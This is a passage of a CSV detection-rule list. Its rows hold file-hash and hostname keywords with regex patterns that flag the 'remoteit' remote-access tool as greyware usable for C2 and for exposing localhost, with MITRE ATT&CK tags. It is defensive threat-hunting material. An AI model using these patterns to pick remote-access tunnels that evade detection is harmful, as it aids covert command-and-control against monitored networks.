"*7e735d5682bcc025c49cd916f004ae6649d736bae2e486098cd34c29e50c21cf*",".{0,1000}7e735d5682bcc025c49cd916f004ae6649d736bae2e486098cd34c29e50c21cf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7f0125964d3060da6c75a5229f87c9be434abf3566c2fcd3c461868aa33199be*",".{0,1000}7f0125964d3060da6c75a5229f87c9be434abf3566c2fcd3c461868aa33199be.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7f59d8d46332b5cd74fa92390567375011b6123e8ccc2a1b4f91fa17761cd617*",".{0,1000}7f59d8d46332b5cd74fa92390567375011b6123e8ccc2a1b4f91fa17761cd617.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*80fe638eebe79635247d036438363f307f96dc388ca50ac5d4456b121c40b702*",".{0,1000}80fe638eebe79635247d036438363f307f96dc388ca50ac5d4456b121c40b702.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*81265cdf4e2efcc4c9285c8d2a4cf2716f0108d861bbababd01cf4bce9b2486c*",".{0,1000}81265cdf4e2efcc4c9285c8d2a4cf2716f0108d861bbababd01cf4bce9b2486c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*820b29ceaeed51da52cd45987f9a0ebcca4335aff654204393c0705e83324d50*",".{0,1000}820b29ceaeed51da52cd45987f9a0ebcca4335aff654204393c0705e83324d50.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*820d907e4d5c567988b402ab0e31414937fd187b273004a538880f20aaefaa21*",".{0,1000}820d907e4d5c567988b402ab0e31414937fd187b273004a538880f20aaefaa21.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*84b735e9c0af06be82353d3cfc511ffe8edcfc7e2952aceaec7221b282488d69*",".{0,1000}84b735e9c0af06be82353d3cfc511ffe8edcfc7e2952aceaec7221b282488d69.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*87c0e2e1aa8e9c492a4ae12219f7a14cae0724c57a127445f92513e4acc962b3*",".{0,1000}87c0e2e1aa8e9c492a4ae12219f7a14cae0724c57a127445f92513e4acc962b3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*88489815bf08cd6b93b92f3c21c76926e08c1c4f3e31c2f4a303eaa3b58f6c91*",".{0,1000}88489815bf08cd6b93b92f3c21c76926e08c1c4f3e31c2f4a303eaa3b58f6c91.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8988af63d7f1d5a9f1ffaf6f24c487e8713df21faf0ae8fc7bfb7996583c02ad*",".{0,1000}8988af63d7f1d5a9f1ffaf6f24c487e8713df21faf0ae8fc7bfb7996583c02ad.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*89dd76ded9f76dc5e8590241d0564c26146f3716d814a5281d65a719d5dd66cf*",".{0,1000}89dd76ded9f76dc5e8590241d0564c26146f3716d814a5281d65a719d5dd66cf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8a2ee3773f2b5a22f6f01569e9d17cd3e1eba7c2e215e043c014b4bc609e55ef*",".{0,1000}8a2ee3773f2b5a22f6f01569e9d17cd3e1eba7c2e215e043c014b4bc609e55ef.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8b0da574d5be1c375f60b1f2e93a77ba8a1742df128a8557963757434e2375e2*",".{0,1000}8b0da574d5be1c375f60b1f2e93a77ba8a1742df128a8557963757434e2375e2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8b4025c1613827180ca686411119d98da4b7540017dfee4ec0daf6631b0394fb*",".{0,1000}8b4025c1613827180ca686411119d98da4b7540017dfee4ec0daf6631b0394fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8bc84212c03f5e2ebce1c44cc5e1315309cc685592023892841cf0873a2b3560*",".{0,1000}8bc84212c03f5e2ebce1c44cc5e1315309cc685592023892841cf0873a2b3560.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8c55fb2a90cd6c8f90e19b1cf4413ba4fc427a67ea6cdae2369abf10d3a83e88*",".{0,1000}8c55fb2a90cd6c8f90e19b1cf4413ba4fc427a67ea6cdae2369abf10d3a83e88.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8d94ccdfe844f9763d5a09b3cdaa68b44916b16f6ebcf92481837860ad010c82*",".{0,1000}8d94ccdfe844f9763d5a09b3cdaa68b44916b16f6ebcf92481837860ad010c82.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8dcd8560184c700cf3800cbfa76639d1e3eeda602963c40f56390626c51f9aa6*",".{0,1000}8dcd8560184c700cf3800cbfa76639d1e3eeda602963c40f56390626c51f9aa6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8e306bcd87bb1fbfe39a22da9ab02751cd9289b721da818a7b0cbc2916e98493*",".{0,1000}8e306bcd87bb1fbfe39a22da9ab02751cd9289b721da818a7b0cbc2916e98493.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8e7cd66e174744da7d7c8ec0d9caee4a0b1a57d9f51d9967ae1e8fc78f938a82*",".{0,1000}8e7cd66e174744da7d7c8ec0d9caee4a0b1a57d9f51d9967ae1e8fc78f938a82.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8ee8ca3b67ad7256a43c6a7d00cee2c22ff45929cd69d75e7212c42485f37c97*",".{0,1000}8ee8ca3b67ad7256a43c6a7d00cee2c22ff45929cd69d75e7212c42485f37c97.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*8f614310b7de7c1d7e19932a82f40a91e7c328966f9b3dec08fe8266bbcfdc7d*",".{0,1000}8f614310b7de7c1d7e19932a82f40a91e7c328966f9b3dec08fe8266bbcfdc7d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*906c39d77d4fab235031fb83f0dc40657c4c25251be92de4236551c15033e997*",".{0,1000}906c39d77d4fab235031fb83f0dc40657c4c25251be92de4236551c15033e997.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*908fe7bf70340eb71df77a54c9fbcedf514573e81f6efd15a9110b4a25d9b878*",".{0,1000}908fe7bf70340eb71df77a54c9fbcedf514573e81f6efd15a9110b4a25d9b878.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9292fadcd27e41de30c6cd2356f882a53488ff91f60999170dfd4be311af37fb*",".{0,1000}9292fadcd27e41de30c6cd2356f882a53488ff91f60999170dfd4be311af37fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*92c129a8547733e8de54b84e7e0a233cdd1330083a07cb1309926eb8dd678db9*",".{0,1000}92c129a8547733e8de54b84e7e0a233cdd1330083a07cb1309926eb8dd678db9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*930fd8e9878e8e96b022a9ab62f3471938c8c93898914df46a02d49f246abb22*",".{0,1000}930fd8e9878e8e96b022a9ab62f3471938c8c93898914df46a02d49f246abb22.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*93502803691a7c14ccd0c0132ac8b12dafb621e7840243887150c3e68836b998*",".{0,1000}93502803691a7c14ccd0c0132ac8b12dafb621e7840243887150c3e68836b998.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*954e01f392b21020cb6cb21c13199d8768ee00e24ebf32566bfdad3a212036bd*",".{0,1000}954e01f392b21020cb6cb21c13199d8768ee00e24ebf32566bfdad3a212036bd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*983582e34fcec444e33dafa6b533ba974086c16520631cd2f07fef6f523a8efc*",".{0,1000}983582e34fcec444e33dafa6b533ba974086c16520631cd2f07fef6f523a8efc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*987f7e9147612ea1182fe989fd19c70cead695da16ee63dd26458ebb43c7b556*",".{0,1000}987f7e9147612ea1182fe989fd19c70cead695da16ee63dd26458ebb43c7b556.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*997e2ae3d49570976fdf7c1e743d23e619f8d8f3fd6fcc689545e5c357ec95a6*",".{0,1000}997e2ae3d49570976fdf7c1e743d23e619f8d8f3fd6fcc689545e5c357ec95a6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9b6df8785bfcc71ad646fd17f581744eff6993490e5cfc1505850117eee701ab*",".{0,1000}9b6df8785bfcc71ad646fd17f581744eff6993490e5cfc1505850117eee701ab.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9bde1bf43cd8dc8d67f5e2b773d4315344315b4a52d2be26dd49c484678bdaaa*",".{0,1000}9bde1bf43cd8dc8d67f5e2b773d4315344315b4a52d2be26dd49c484678bdaaa.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9c61fb474707f74a2bd8529b5ee56a26baf315458c07cc8aff66d117081f1aea*",".{0,1000}9c61fb474707f74a2bd8529b5ee56a26baf315458c07cc8aff66d117081f1aea.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9c78d685436d461ec75c3bdfcd09503eb86ce64ac58c13da6a8c82bdc2e80703*",".{0,1000}9c78d685436d461ec75c3bdfcd09503eb86ce64ac58c13da6a8c82bdc2e80703.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9d4c213bbc51347764c8b62223c50da024037f63150d7f57ec12e22d1eaf0dfc*",".{0,1000}9d4c213bbc51347764c8b62223c50da024037f63150d7f57ec12e22d1eaf0dfc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9dea73ffa9687042001217d5dd36ce8083f36849cadfd88945cd55f669e9bb70*",".{0,1000}9dea73ffa9687042001217d5dd36ce8083f36849cadfd88945cd55f669e9bb70.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*9f1af621fb39dac8f826f5c5dd50cc8ef3539be72ae9b06a5607eadc23d4dc0a*",".{0,1000}9f1af621fb39dac8f826f5c5dd50cc8ef3539be72ae9b06a5607eadc23d4dc0a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a028984075f63af783a3a261c58350a9d153e63c277db78614fb4b3aca780631*",".{0,1000}a028984075f63af783a3a261c58350a9d153e63c277db78614fb4b3aca780631.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a0e7d15b84357f97ac46b469e179a9932682d5763204ea90590ea71ac90aa515*",".{0,1000}a0e7d15b84357f97ac46b469e179a9932682d5763204ea90590ea71ac90aa515.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a1cb3625445b64b0302323e1f751ae23885d31e5a260766f85f492498cc43362*",".{0,1000}a1cb3625445b64b0302323e1f751ae23885d31e5a260766f85f492498cc43362.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a42f8bc0fa9c489ea06896d74810c9bfab10738b137bc567c3e656ec6f8f5d1d*",".{0,1000}a42f8bc0fa9c489ea06896d74810c9bfab10738b137bc567c3e656ec6f8f5d1d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a46a1cfc06ed9eb2276a879dcc949fe0256d511cf0925ab2343b9e92542fb8f2*",".{0,1000}a46a1cfc06ed9eb2276a879dcc949fe0256d511cf0925ab2343b9e92542fb8f2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a67a2d20c217e9923d9a614870d54152379c8d4f2232114a158d5e88f9ccd4b1*",".{0,1000}a67a2d20c217e9923d9a614870d54152379c8d4f2232114a158d5e88f9ccd4b1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a6c8218887fdb66cefdced3195f1424a714add1f6fe369ba7ddbfe1e7434191b*",".{0,1000}a6c8218887fdb66cefdced3195f1424a714add1f6fe369ba7ddbfe1e7434191b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a7266ba33c7873fcacfaa675551204bbc56549ec7d859635822009e0e2bda9d3*",".{0,1000}a7266ba33c7873fcacfaa675551204bbc56549ec7d859635822009e0e2bda9d3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*a73a39cce96e40c9e574607561cabeb8f0b46ffa5b996c1071d434e6a72e34bf*",".{0,1000}a73a39cce96e40c9e574607561cabeb8f0b46ffa5b996c1071d434e6a72e34bf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*a7dff33a69fd314049f9b1ad78340c875ba5681eb4a828d1cebc79e6f09bf35c*",".{0,1000}a7dff33a69fd314049f9b1ad78340c875ba5681eb4a828d1cebc79e6f09bf35c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ab775568ac52bb1e4ceffa6ae38c7bc11d769a6ee52cf964d9ece909c5a397fe*",".{0,1000}ab775568ac52bb1e4ceffa6ae38c7bc11d769a6ee52cf964d9ece909c5a397fe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ab8b178678ce6ccbfeab5183c65c4de04eb768892f5710557c297e45cd567dfe*",".{0,1000}ab8b178678ce6ccbfeab5183c65c4de04eb768892f5710557c297e45cd567dfe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ac3d4ecb448c66634efad135d94657a27eed4f8c30aa7f32e4ecb2da621c3d47*",".{0,1000}ac3d4ecb448c66634efad135d94657a27eed4f8c30aa7f32e4ecb2da621c3d47.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*add859c23de8190eca95058cc1cca930786b1c673b8dd3e25dedd8e12396469a*",".{0,1000}add859c23de8190eca95058cc1cca930786b1c673b8dd3e25dedd8e12396469a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*ae494aa39434950473ecd7ba70bd89cb9d10cabbe7637b9775a4ba1f26dee665*",".{0,1000}ae494aa39434950473ecd7ba70bd89cb9d10cabbe7637b9775a4ba1f26dee665.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*aebfc8f6a11074dfc2e95800f32edc984abeb67eb6a07c2056acb149fbc37e66*",".{0,1000}aebfc8f6a11074dfc2e95800f32edc984abeb67eb6a07c2056acb149fbc37e66.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*afe5cdae79e5f79047b9fbca32463a6b5b82b9f0b11c9ec712eff47f526a5fec*",".{0,1000}afe5cdae79e5f79047b9fbca32463a6b5b82b9f0b11c9ec712eff47f526a5fec.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*api.remot3.it*",".{0,1000}api\.remot3\.it.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*api01.remot3.it*",".{0,1000}api01\.remot3\.it.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*B00004294C7ABEDC67BD41B0F3CB0C9730BEDA03BC3CE2709B7F838585133B2C*",".{0,1000}B00004294C7ABEDC67BD41B0F3CB0C9730BEDA03BC3CE2709B7F838585133B2C.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*b122583cf21343bfe83444d90b3223ff4abd42738e5817a1ba5095ddbc0202ed*",".{0,1000}b122583cf21343bfe83444d90b3223ff4abd42738e5817a1ba5095ddbc0202ed.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b25e38016ee6cae1175968f4686699588b208d14f27320052e097c5a252d2d1a*",".{0,1000}b25e38016ee6cae1175968f4686699588b208d14f27320052e097c5a252d2d1a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b38a8c339aa39c37a3680e31876bc6b4e5c9f337d4c0f409fd17b696befecf93*",".{0,1000}b38a8c339aa39c37a3680e31876bc6b4e5c9f337d4c0f409fd17b696befecf93.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b50382b91253028e0f21ca8d585456adbdd8eb05d20efe8eb024ff2253f49a3a*",".{0,1000}b50382b91253028e0f21ca8d585456adbdd8eb05d20efe8eb024ff2253f49a3a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*b57f1898dda9bdacec25669b4a8ccdb6905b5d0b9c9d0c4c3695d8aa54181bee*",".{0,1000}b57f1898dda9bdacec25669b4a8ccdb6905b5d0b9c9d0c4c3695d8aa54181bee.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
